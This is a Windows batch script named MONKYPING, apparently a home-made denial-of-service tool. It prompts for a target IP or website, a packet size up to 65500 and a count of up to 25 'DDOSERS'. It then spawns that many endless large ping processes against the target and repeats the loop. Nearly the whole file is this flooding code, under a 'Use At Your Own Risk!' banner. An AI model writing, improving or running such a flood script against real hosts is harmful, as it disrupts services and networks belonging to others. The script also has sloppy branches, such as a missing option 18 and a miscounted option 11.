@echo off
Title MONKYPING3.1BETA
color 2
echo ===============================================================================
echo =                                MONKYPING                                    =
echo ===============================================================================
set /p D= IP/WEBSITE:
 
:START
color 0e
cls
echo (Max Amount 65500)
echo.
set /p O= PACKET SIZE:
 
color 0c
cls
echo ===============================================================================
echo =                          Use At Your Own Risk!                              =
echo ===============================================================================
echo                                                                 
echo                         /:-.                                     
echo                        -MMMMMmhs+:.                              
echo                        sMMMMMMMMMMMmy+-                          
echo                        NMMMMMMMMMMMMMMMms:`                      
echo                       :MMMMMMMMMMMMMMMMMMMms.                    
echo                       yms+::--::/+oyhdNMMNNMNy-                  
echo                      `N/             ``.:.ydNMNs`                
echo                      +N                    ``:smm:               
echo                      ds           `-:-         `+d/              
echo                     -M-     `:+oydmNMNd/`        `+:             
echo                     sd     -dMMMMMMMMMMMm+`        .             
echo                     m+    :NMMMMMMMMMMMMMMd-                     
echo                    :M`   `mMMMMMMMMMMMMMMMMm.                    
echo                   yy    sMMMMNho++ymMMMMMMMy                    
echo                   .N/   +MMMMm:     `-+yNMMMM-                   
echo                  `om.`./NMMMN- `  `` ` `+MMMMo`                  
echo                   ds  sNMMMMy            mMMM:                   
echo                  -M.  dMMMMd.            sMMm                    
echo                  sd   oMMMM/             oMMN                    
echo                  N+   `NMMMh             yMMM-                   
echo                 /N`    mMMMM:            dMMM+                   
echo                 hy    `NMMMMd:`         `MMMMs                   
echo                `M:   .sMMMMMMMh.        sMMMM+                   
echo                +m  `+mMMMMMMMMMN:     -yMMMMMmy+-`               
echo                ms.omMMMMMMMMMMMMN:  /hNMMMMMMMMMMmy+-`           
echo              `:MmMMMMMMMMMMMMMMMMm`sMMMMMMMMMMMMMMMMMmy/.        
echo           :oydMMMMMMMMMMMMMMMMMMMMsMMMMMMMMMMMMMMMMMMMMMMs       
echo           dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM-      
echo           /MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.     
echo           hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.    
echo          .//////////////////////////////////////////////////-    
echo (Max Amount 25)
echo.
set /p S= HOW MAN DDOSERS:
cls
goto %S%
pause
 
:1
start ping %D% -t -l %O%
goto START
:2
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:3
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:4
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:5
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:6
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:7
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:8
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:9
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:10
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:11
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:12
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:13
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:14
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:15
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:16
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:17
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:19
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:20
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:21
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:22
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
 
:23
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
 
:24
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
 
:25
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
start ping %D% -t -l %O%
goto START
:END
echo
